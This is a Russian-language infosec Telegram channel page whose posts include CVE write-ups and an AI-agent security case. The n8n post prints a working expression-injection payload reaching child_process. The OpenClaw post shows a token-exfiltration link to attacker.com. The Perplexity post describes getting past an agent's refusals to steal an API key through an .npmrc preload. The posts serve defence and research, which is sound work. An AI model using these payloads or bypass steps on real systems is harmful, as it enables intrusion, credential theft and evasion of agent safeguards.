PurpleBear
Open in Telegram
Канал о практической ИБ, Pentest, Red Team и Purple Team тестировании. Мы публикуем новости, обзоры инструментов защитников и атакующих, анализируем отчеты APT группировок, разбираем популярные уязвимости, обсуждаем новые CVE'шки и многое другое
Show more4 606
Subscribers
+124 hours
+137 days
+5330 days
Data loading in progress...
Similar Channels
Tags Cloud
No data
Any problems? Please refresh the page or contact our support manager.
Incoming and Outgoing Mentions
---
---
---
---
---
---
Attracting Subscribers
September '26
September '26
+26
in 0 channels
August '26
+98
in 1 channels
Get PRO
July '26
+85
in 0 channels
Get PRO
June '26
+104
in 1 channels
Get PRO
May '26
+87
in 0 channels
Get PRO
April '26
+124
in 0 channels
Get PRO
March '26
+143
in 2 channels
Get PRO
February '26
+95
in 0 channels
Get PRO
January '26
+96
in 1 channels
Get PRO
December '25
+66
in 0 channels
Get PRO
November '25
+86
in 0 channels
Get PRO
October '25
+65
in 3 channels
Get PRO
September '25
+56
in 1 channels
Get PRO
August '25
+68
in 3 channels
Get PRO
July '25
+88
in 8 channels
Get PRO
June '25
+103
in 1 channels
Get PRO
May '25
+92
in 2 channels
Get PRO
April '25
+109
in 2 channels
Get PRO
March '25
+178
in 16 channels
Get PRO
February '25
+115
in 1 channels
Get PRO
January '25
+72
in 3 channels
Get PRO
December '24
+148
in 2 channels
Get PRO
November '24
+343
in 5 channels
Get PRO
October '24
+421
in 13 channels
Get PRO
September '24
+1 172
in 12 channels
Get PRO
August '24
+195
in 1 channels
Get PRO
July '24
+109
in 3 channels
Get PRO
June '24
+180
in 8 channels
Get PRO
May '24
+189
in 4 channels
Get PRO
April '24
+272
in 7 channels
Get PRO
March '24
+126
in 6 channels
Get PRO
February '24
+114
in 3 channels
Get PRO
January '24
+184
in 6 channels
Get PRO
December '23
+100
in 3 channels
Get PRO
November '23
+48
in 1 channels
Get PRO
October '23
+400
in 1 channels
| Date | Subscriber Growth | Mentions | Channels | |
| 10 September | 0 | |||
| 09 September | +1 | |||
| 08 September | +2 | |||
| 07 September | +1 | |||
| 06 September | +6 | |||
| 05 September | +1 | |||
| 04 September | +5 | |||
| 03 September | +3 | |||
| 02 September | +5 | |||
| 01 September | +2 |
Channel Posts
Проверка защищённости 24/7: что уже можно автоматизировать
Всем привет! На прошлой неделе модерировал эфир AM Live про автоматизированную проверку защищённости.
Автоматизация уже неплохо масштабирует известные проверки, но пока не очень полноценно воспроизводит мышление атакующего.
Найти внешний актив, проверить известную уязвимость, воспроизвести заданную технику, подтвердить эксплуатацию или выполнить ретест можно быстрее и регулярнее. Но построить нестандартную цепочку, разобраться в бизнес-логике, изменить гипотезу после первой неудачи и понять реальный impact всё ещё способен далеко не каждый инструмент😅
В эфире попробовали провести эту границу и разобраться, что сегодня скрывается за EASM, BAS и автопентестом.
Основные выводы, которые я для себя зафиксировал:
📌 Лучше всего автоматизируются recon, повторяемые проверки, эксплуатация известных техник и контроль устранения
📌 Автоматизация увеличивает покрытие и частоту тестирования, но не гарантирует обнаружение новых векторов и сложных цепочек компрометации
📌 Найденная уязвимость не снижает риск, пока она не связана с активом, сценарием атаки и недопустимым для бизнеса событием
📌 Отдельные EASM, BAS и автопентест без обмена контекстом создают несколько очередей находок вместо единого процесса
📌 Bottleneck постепенно перемещается от поиска уязвимостей к триажу, приоритизации, устранению и повторной проверке
📌 LLM-агенты могут помогать с анализом данных, генерацией гипотез и автоматизацией рутины, но давать им бесконтрольный доступ к продовой инфраструктуре пока слишком оптимистично🙈
Отдельно получилась интересная дискуссия о том, чьё кунг-фу сегодня сильнее: автоматизация атакующих или автоматизация защитников. Атакующему достаточно один раз найти рабочий путь, тогда как защитнику приходится регулярно проверять множество активов, техник и возможных цепочек.
Поэтому непрерывная проверка защищённости начинается не с покупки ещё одного инструмента. Сначала нужно понимать, что именно мы защищаем, какие сценарии хотим проверять, кто принимает результат в работу и как подтверждается устранение. Иначе автоматизация просто быстрее создаёт новый backlog
Спасибо экспертам за содержательную дискуссию:
⚡️ Николай Гончаров, Security Vision
⚡️ Давид Ордян, METASCAN
⚡️ Аскар Добряков, K2 Кибербезопасность
⚡️ Ярослав Бабин, Positive Technologies
⚡️ Максим Пятаков, CtrlHack
⚡️ Денис Гамаюнов, SolidLab Group
⚡️ Аркадий Никифоров, Бастион
Какую часть работы пентестера вы уже готовы полностью отдать автоматике: recon, эксплуатацию известных уязвимостей, построение attack path или ретест? Пожалуйста поделитесь мнением в коментариях🙏
| 2 | Open·kritt
Open-source платформа для оркестрации AI-агентов, которые ищут уязвимости в исходном коде.
Идея в том, что скармливать LLM целый репозиторий с промптом найди все уязвимости обычно не очень эффективно😅 Поэтому исследование разбивается на небольшие связанные задачи, которые выполняются последовательно или параллельно, а результаты передаются следующим агентам.
Основной объект платформы - Workflow: дерево prompt-шагов с настраиваемыми переменными, связями и output schema.
Например, встроенный external-flow-analysis работает так:
📌 Первый агент ищет внешние entrypoints
📌 Следующие агенты тыкают достижимые execution flows
📌 Каждый flow отдельно исследуется на наличие уязвимостей
📌 Результат возвращается в структурированном виде: описание, тип уязвимости, файл, строка, trigger flow, malicious input и оценка возможности эксплуатации.
Прдзадачи одного уровня могут выполняться параллельно, поэтому вместо одного огромного контекста получается несколько сфокусированных исследований.
Что умеет open·kritt:
✔️ Создавать workflow в визуальном редакторе или генерировать их с помощью AI
✔️ Настраивать промты, переменные, зависимости и output schemas
✔️ Анализировать локальные и GitHub-репозитории, включая приватные
✔️ Подключать дополнительные репозитории как dependencies
✔️ Использовать Agent Skills для конкретных языков, архитектур и классов уязвимостей
✔️ Автоматически дедуплицировать и ранжировать находки
✔️ Запускать post-scripts для дополнительной проверки находок
✔️ Управлять сканированиями через Web UI и HTTP API
После основного workflow запускается post-processing. Сначала semantic deduplication объединяет находки, относящиеся к одной root cause и location/entrypoint. Простого совпадения по классу уязвимости недостаточно👍
Затем находки ранжируются с учётом impact, exploit likelihood, scope и вероятности bounty💰Критерии оценки критичности можно также настраивать с помощью текстовых инструкций.
После этого для каждого канонического файндинга могут запускаться post-scripts. Дополнительному агенту можно поручить проверить эксплуатацию, собрать доказательства, подготовить PoC, уточнить влияние или сформировать отчёт.
Сейчас есть два встроенных workflow:
🔴 external-flow-analysis - исследование entrypoints и достижимых от них execution flows
🔴 Cosmos ABCI Panic Halt Review - поиск panic-path в Go-приложениях на базе Cosmos ABCI
В качестве агентов используются Codex и Claude Code. Для доступа к моделям поддерживаются Codex login, OpenAI API, Anthropic API и OpenRouter API.
Отдельно стоит учитывать модель угроз. Хотя платформа разворачивается локально, исходный код может передаваться выбранному внешнему провайдеру.
Tool-enabled агенты работают от root в одноразовых Docker-контейнерах, получают доступную для записи копию репозитория и прямой доступ в интернет. Сами job-контейнеры не получают docker socket, базу данных и .env, но engine управляет docker daemon. Поэтому запускать платформу рекомендуется на отдельной VM.
Backend по умолчанию не имеет в аутентификацию. Порты привязаны слушают на localhost, но выставлять интерфейс наружу без reverse proxy и дополнительной аутентификации точно не стоит🙈
Авторы заявляют, что заработали более $1,5 млн на bug bounty, и приводят ссылки на профили Immunefi и HackenProof.
По сути это не очередной AI-SAST, а платформа для декомпозиции security research: управляемые промты, параллельные агенты, структурированные результаты, deduplication, ranking и дополнительная валидация.
Полноту покрытия никто не гарантирует, а результаты всё равно требуют ручной проверки. Но для автоматизации source code review и экспериментов с AI-агентами выглядит очень неплохо🔥 | 908 |
| 3 | Damn Vulnerable Drone
Всем привет! Давно я не писал нормальных постов, надо исправляться👇
Если заниматься безопасностью дронов на реальном стенде, обычно нужен как минимум сам дрон, полётный контроллер,, набор радиомодулей и достаточно свободного пространства, где результат неудачного эксперимента никому не прилетит в голову😅
На выходных мне попался на глаза интересный проект Damn Vulnerable Drone - лаборатория для изучения атак на дроны, основанная на популярной архитектуре ArduPilot/MAVLink и полностью разворачиваемая в Docker.
Под капотом используется ArduPilot SITL (Software-in-the-Loop), позволяющий запускать прошивку полётного контроллера в виртуальном окружении. В Full Mode к нему добавляется Gazebo с физикой и полноценной 3D-симуляцией, а в Lite Mode используется встроенная 2D-модель динамики полёта ArduPilot без необходимости в GPU.
Что внутри:
✔️ Flight Controller с ArduPilot SITL
✔️ Companion Computer с веб-интерфейсом и виртуальным serial-соединением с полётным контроллером
✔️ MAVLink Router для маршрутизации телеметрии
✔️ Интеграция с MAVProxy и запуск QGroundControl в один клик на x86
✔️ Виртуальная Wi-Fi-сеть 802.11 в режимах WEP и WPA2
✔️ RTSP-стрим с бортовой камеры, управление gimbal и интеграция с Companion Computer
✔️ Динамические ArduPilot .bin flight logs на виртуальной SD-карте
✔️ Management Console для запуска сценариев и управления состояниями полёта
✔️ Детальные walkthrough для каждого сценария, спрятанные под spoiler, чтобы сразу не портить удовольствие😎
Можно запускать пять состояний дрона: Initial Boot, Arm & Takeoff, Autopilot Flight, Emergency/Return-To-Land и Post-Flight Data Processing.
Атакующих сценариев внутри уже прилично:
🔴 Wi-Fi analysis, cracking и deauthentication
🔴 Обнаружение дрона, Companion Computer и Ground Control Station
🔴 Packet Sniffing и Protocol Fingerprinting
🔴 Обнаружение GPS и телеметрии
🔴 MAVLink Injection и подмена Ground Control Station
🔴 GPS, attitude, battery, system status и satellite spoofing
🔴 Waypoint Injection и извлечение полётной миссии
🔴 Geofencing Attack и Return-to-Home Point Override
🔴 Flight Termination и Denial-of-Takeoff
🔴 Перехват RTSP-стрима и захват управления gimbal
🔴 Извлечение параметров и flight logs
🔴 Companion Computer Takeover
🔴 ROS 2 DDS Graph Enumeration, Topic Replay и Rogue Publisher Injection
🔴 Firmware Decompile и Firmware Modding
🔴 Различные DoS и flooding-атаки на каналы управления
Для быстрого старта в Lite Mode без GPU и виртуальной Wi-Fi-сети достаточно:
git clone https://github.com/nicholasaleks/Damn-Vulnerable-Drone.git
cd Damn-Vulnerable-Drone
sudo ./start.sh --mode lite --no-wifi
А для полноценной симуляции с Gazebo и виртуальной WPA2-сетью:
sudo ./start.sh --mode full --wifi wpa2
Для Full Mode официально поддерживается только Kali Linux. Авторы рекомендуют 8–16 GB RAM, 2–4 CPU cores, 100 GB свободного места и GPU с поддержкой OpenGL 3.0+. Lite Mode может работать на большинстве Linux-дистрибутивов и требует примерно 4–8 GB RAM, 2 CPU cores, 100 GB свободного места и не нуждается в GPU.
По сути получилась хорошая лаба, в которой можно безопасно изучать архитектуру современных беспилотников, MAVLink, телеметрию, системы управления и техники атак, не рискуя превратить реальный дрон в дорогостоящий кирпич🔥
Конечно, виртуальная лаборатория не заменит работу с реальным железом, радиоканалами и особенностями конкретных производителей, но для знакомства с drone hacking, проведения тренировок и отработки базовых техник выглядит очень достойно.
⚙️ Репозиторий: https://github.com/nicholasaleks/Damn-Vulnerable-Drone
📚 Attack Scenarios: https://github.com/nicholasaleks/Damn-Vulnerable-Drone/wiki/Attack-Scenarios | 1 312 |
| 4 | Поздравляю победителей🎉
В ближайщее свяжусь со всеми в ЛС✍️ | 1 314 |
| 5 | No text... | 1 300 |
| 6 | 🎉 Результаты розыгрыша:
🏆 Победители:
1. Stan (@Stan393)
2. Yaroslav
3. Mister (@mrViscous)
✔️Проверить результаты | 1 416 |
| 7 | ASSUME BIRCH MEETUP #6
18 июня в Москве пройдёт ASSUME BIRCH MEETUP #6 - закрытая встреча для специалистов в области атакующей информационной безопасности.
Формат прежний:
Никаких рекламных докладов и случайных людей.
Только наше комьюнити, толковые доклады и хороший отдых после работы.
Что будет:
📍 закрытая московская локация
🗣 доклады от экспертов, которым есть что рассказать
🍻 напитки, закуски и неформальная атмосфера
🤝 общение с теми, кто понимает ваши шутки про дедлайны, скоуп и внезапные “а давайте ещё вот это проверим”
Мероприятие приватное, записей не будет, вход только по приглашениям.
Но, как обычно, есть шанс попасть внутрь без тайного рукопожатия: разыгрываем 3 проходки.
Условия простые:
⚡️ подписаться на @assume_birch и @purple_medved
⚡️ нажать кнопку - Участвовать
⚡️ дождаться, пока бездушный рандом выберет везунчиков 02.06.2026 в 13:37
Просьба одна: участвуйте только если точно сможете прийти.
До встречи! | 1 938 |
| 8 | С Днём Победы!
Этот день навсегда останется символом мужества, стойкости и героизма нашего народа.
Мы чтим каждого героя, кто отстоял мир и свободу, подарив нам возможность жить и развиваться! | 1 960 |
| 9 | ◻️◻️◻️◻️◻️
Защита ДБО: как банки противостоят целевым атакам в 2026 году | Цифровизация банков
Дистанционное банковское обслуживание — лакомая цель для злоумышленников. Атаки становятся точнее, умнее и всё сложнее отличимы от действий легитимного пользователя. Как банки отвечают на этот вызов?
В этом выпуске совместного подкаста Global Digital Space и Национального банковского журнала «Цифровизация банков» разбираемся, как устроена защита ДБО в 2026 году.
Говорим о том, что происходит прямо сейчас:
✅ какие атаки на ДБО наиболее опасны сегодня и как изменился их профиль;
✅ где граница ответственности между антифродом, WAF и API security;
✅ как ИИ и дипфейки меняют арсенал злоумышленников;
✅ насколько оправданы бюджеты на соответствие требованиям регуляторов;
✅ зрелость российских решений: где ещё есть пробелы;
✅ как улучшить клиентский путь, не жертвуя безопасностью.
🎙 Ведущий: Вадим Шелест, Wildberries & Russ
Эксперты:
🎼 Ирина Чурикова, SafeTech
🎼 Павел Луцик, КриптоПро
🎼 Владимир Гриднев, WMX (Вебмониторэкс)
🎼 Олег Волков, банк Кубань Кредит
🎼 Дмитрий Никишов, банк ДОМ.РФ
Смотрите тут ⬇
📺 VK Видео 📺 YouTube
📺 RUTUBE 📝 Дзен
#GDS #NBJ #подкаст | 1 181 |
| 10 | Hacked Perplexity Computer and got unlimited Claude Code 🤖
Сегодня хочу рассказать про интересное исследование Perplexity Computer - отличный пример того, где ломается agent‑инфраструктура.
Исследователь изучал sandboxing multi‑agent системы и обнаружил внутри sandbox установленный Claude Code (Node.js, bypass‑permissions mode) Поэтому возник вполне логичный вопрос - где хранится Anthropic API key и как он изолирован?
6 попыток вытащить ключ провалились - модель и prompt‑safety реально отработали хорошо:
🔴 dump process.env - отказ
🔴 троян на shared FS - агент понял подвох
🔴.bashrc / PATH hijack —-не сработало
🔴 system prompt - не найден
А потом классика supply‑chain атак 😎
Claude Code - это Node.js → запускается через npm → npm читает ~/.npmrc → home‑директория доступна на shared filesystem.
Через .npmrc можно задать:
node-options=--require /path/to/preload.js
--require подгружает JS до старта приложения и до любых safety‑проверок.
💣 Эксплоит = 3 команды:
1️⃣ preload‑скрипт, который пишет process.env в файл
2️⃣ запись .npmrc
3️⃣ любая задача
Результат - доступ к Perplexity proxy‑token к Anthropic API.
И самое интересное:
▪️ токен не IP‑restricted
▪️ не sandbox‑bound
▪️ не ephemeral
▪️ биллинг — на Perplexity
100k+ токенов × несколько запусков → деньги не списываются.
Фактически unlimited Claude Code за их счёт 💸
Модель всё сделала правильно - сломалась именно архитектура.
Если вы строите agent‑infra, стоит подумать про:
🔐 токен должен быть привязан к sandbox
⏳ токен должен быть короткоживущим
💳 usage должен биллиться на пользователя
Иначе proxy - это просто лишний network hop, который ничего не защищает.
Большинство multi‑agent продуктов сегодня устроены примерно так же 😎 | 2 727 |
| 11 | One-Click RCE + unauth API keys leak в OpenClaw/Clawdbot/Moltbot (CVE‑2026‑25253)
Исследователи из Hunt.io разобрали потенциальные последствия эксплуатации уязвимости CVE‑2026‑25253 с оценкой CVSSv3 = 8.8 в OpenClaw и его форках (Clawdbot, Moltbot). Это browser‑automation фреймворки, связывающие LLM с браузером через Playwright. Эти агенты обычно имеют доступ к файловой системе и API‑ключам LLM, что автоматически делает последствия эксплуатации довольно критичными.
🤦 Основная проблема:
1️⃣ Ручка /api/export-auth доступна без аутентификации
2️⃣ Позволяет выгрузить все сохранённые API‑токены провайдеров LLM (OpenAI, Claude, Google AI и др.)
⚙️ Технические детали эксплуатации
OpenClaw до патча:
1️⃣ Читает параметр gatewayUrl из query‑string
2️⃣ Автоматически подключается к нему по WebSocket
3️⃣ Без подтверждения пользователя отправляет auth‑токен на хост атакующего
💫 Сценарий:
1️⃣ Жертва кликает ссылку:
https://victim-openclaw-ui/?gatewayUrl=wss://attacker.com/exfil
2️⃣ Web‑интерфейс сам подключается к WebSocket на хосте атакующего
3️⃣ Токен мгновенно утекает атакующему
4️⃣ Атакующий использует токен для подключения к Gateway API жертвы
5️⃣ Меняет конфигурацию агента
6️⃣ Вызывает привилегированные API → выполнение произвольного кода на хосте
📊 Масштаб последствий
17 500+ публично доступных инстансов в интернете
68.9% — Clawdbot Control
22.3% — Moltbot Control
8.8% — OpenClaw Control
✅ Рекомендации:
1️⃣ Обновиться до версии OpenClaw v2026.1.29
2️⃣ Считать все ключи скомпрометированными, проверить балансы провайдеров LLM, провести ротацию ключей
3️⃣ Использовать естественный интеллект
4️⃣ Не публиковать AI‑агентов в интернет | 1 606 |
| 12 | ⚠️ Почему API — главная дыра в защите веб-приложений
Даже когда настроены WAF, анти-DDoS и антибот — атаки не прекращаются. Всё чаще защита ломается именно на API: здесь обходят авторизацию, валидаторы и получают доступ к бизнес-логике.
28 января в 11:00 в прямом эфире AM Live покажем, почему API — слабое звено даже в хорошо защищённых веб-приложениях и что с этим делать.
Что вы узнаете:
— Какие уязвимости чаще всего дают атакам зелёный свет
— Как разделить зону ответственности между шлюзами, логикой и разработкой
— Как защитить API, чтобы не стать «точкой входа»
🔗 Регистрируйтесь на эфир по ссылке | 1 638 |
| 13 | n8n Expression Injection → RCE (CVE‑2025‑68613)
В конце прошлого года были опубликованы технические детали эксплуатации критической уязвимости CVE‑2025‑68613 с оценкой CVSSv3 = 9.9 в популярной open‑source платформе автоматизации n8n
n8n - workflow‑движок на Node.js, широко используемый для автоматизации LLM интеграций. У меня n8n используется для домашней автоматизации в качестве альтернативы Node-Red для Home Assistant, но также достаточно часто разворачивается внутри корпоративных сетей, что делает последствия эксплуатации довольно критичными.
В n8n используется механизм expressions - любые значения в формате {{ ... }} интерпретируются как JavaScript и обрабатываются на стороне сервера как есть🤷
Проблема в том, что:
🔴 expression evaluator не имеет строгой sandbox‑изоляции;
🔴 возможен доступ к prototype chain;
🔴 выражения исполняются через небезопасные конструкции уровня Function().
В результате expression injection позволяет выйти из песочницы и получить доступ к runtime Node.js
POC демонстрирующий побег из sandbox:
{{ this.constructor.constructor("return process")() }}
this.constructor → Function
Function.constructor → снова Function
создаётся новая функция, возвращающая process
Дальше всё предсказуемо - получаем child_process и выполняем команды ОС:
{{
this.constructor
.constructor(
"return process.mainModule.require('child_process')" +
".execSync('id').toString()"
)()
}}
Таким образом имея непривилегированную учётку n8n, атакующий может:
✔️ прокинуть себе reverse shell
✔️ украсть токены, секреты и креды из workflow
✔️ модифицировать или подменить бизнес‑логику автоматизации
⚙️ POC: https://github.com/TheStingR/CVE-2025-68613-POC
🔎 Nuclei: https://github.com/rxerium/CVE-2025-68613/blob/main/CVE-2025-68613.yaml
🪲 Уязвимые версии ПО: 0.211.0 – 1.120.3
✅ Рекомендации: Обновиться до версии 1.120.4 / 1.121.1 / 1.122.0 | 2 340 |
| 14 | Поздравляю с наступающим Новым годом! 🥳
Пусть в новом году будет больше спокойствия, уверенности и радости от жизни - не только от работы, но и от простых моментов рядом с близкими.
Желаю крепкого здоровья вам и вашим семьям, внутреннего баланса, сил и энергии идти вперёд.
Пусть будет время на себя, на отдых, на мечты и на то, что действительно важно!
Пусть 2026 год станет годом больших достижений, правильных решений и уверенности в завтрашнем дне.
Живите так, как хочется, цените себя и людей рядом и не забывайте радоваться мелочам.
Отдельное спасибо каждому из вас - за интерес, доверие, обратную связь и участие в развитии канала. Благодаря вам хочется продолжать и делать его лучше.
С наступающим Новым годом! 🎉
До встречи в 2026❤️ | 2 217 |
| 15 | Всем привет!
Запись прямого эфира AM Live на тему «Стратегия информационной безопасности: от разработки до применения» доступна по ссылке: https://www.youtube.com/watch?v=ymcaRTqbR-0
Эфир для тех, кто не хочет узнавать о провале стратегии после атаки из новостей.
❓ Ваша стратегия ИБ — работает? Или это просто файл в папке?
❓ У вас есть метрики зрелости? Критерии эффективности? Проверки в реальных условиях?
Мы с коллегами обсудили:
✅ Как понять, что стратегия ИБ не работает
✅ Что эффективнее: KPI по инцидентам или уровню зрелости
✅ Как проверять устойчивость стратегии с помощью регулярных пентестов и кибериспытаний
✅ Как визуализировать стратегию для совета директоров, чтобы вас услышали
Эфир получился жарким, наполненным интересными дискуссиями между представителями внешнего консалтинга и CISO крупных компаний.
Приятного просмотра! Буду очень признателен за лайки, репосты и комментарии 🙏 | 2 843 |
| 16 | Поздравляю победителей🎉
В ближайщее свяжусь со всеми в ЛС✍️ | 2 509 |
| 17 | 🎉 Результаты розыгрыша:
🏆 Победители:
1. S3 (@s3n_q)
2. Anton (@st1zz999)
3. Over (@elviacro)
✔️Проверить результаты | 2 389 |
| 18 | ASSUME BIRCH MEETUP #5
Декабрь - это не только горящие дедлайны и подведение итогов года. Это еще и идеальное время, чтобы выдохнуть и встретиться с коллегами "по цеху" 🍻 на митапе для специалистов в области атакующей информационной безопасности ASSUME BIRCH #5
Что в программе:
📍 Уютный московский бар и расслабленная обстановка
🗣 Крутые доклады от топовых экспертов индустрии
🍔 Закуски, напитки и возможность выиграть крутой мерч
🤝 Нетворкинг и отличное настроение
📆 04 декабря, 18:30
📍Москва, точная локация будет указана в персональном приглашении
Мероприятие традиционно приватное, записей не будет, вход только по персональным приглашениям.
Но есть 3 проходки, которые мы разыграем. Условия простые, необходимо просто заломать мосад подписаться на каналы @assume_birch и @purple_medved и нажать кнопку Участвовать, а победителей определит бездушный рандом 27.11 в 13:37 Единственная просьба - вписываться, только если уверены что 100% получится прийти🙏 | 2 494 |
| 19 | JA4D and JA4D6: DHCP Fingerprinting
Всем привет! Давно я ничего не писал, потому что, как буквально вчера сказал один мой хороший друг ..."Q4, выживаем как можем"... поэтому сразу лайк, этому посту, у кого тоже самое😜
Пару лет назад я писал про фреймворк JA4+ Network Fingerprinting для снятия отпечатков с трафика, который активно используется различными СЗИ для идентификации вредоносной активности на уровне сети. А на прошлой неделе вышли дополнения JA4D и JA4D6 позволяющие определять активы в момент подключения к сети на основе запросов DHCP/DHCPv6. Суть метода заключается в сравнение фингерпринтов при подключении для основных запросов DHCP/DHCPv6 с библиотекой известных устройств. На данный момент библиотека отпечатков для этого дополнения пока небольшая, но учитывая большую популярность фреймворка у различных вендоров она 100% быстро разрастется.
Таким образом, можно очень быстро идентифицировать любые недоверенные устройства/ОС в вашей корпоративной сети, без активного сканирования. При этом методов байпаса для JA4+ фактически не существует, поэтому любая пентестерская kali lincox😂 будет моментально светиться в логах СЗИ 👍 | 2 532 |
| 20 | No text... | 1 956 |
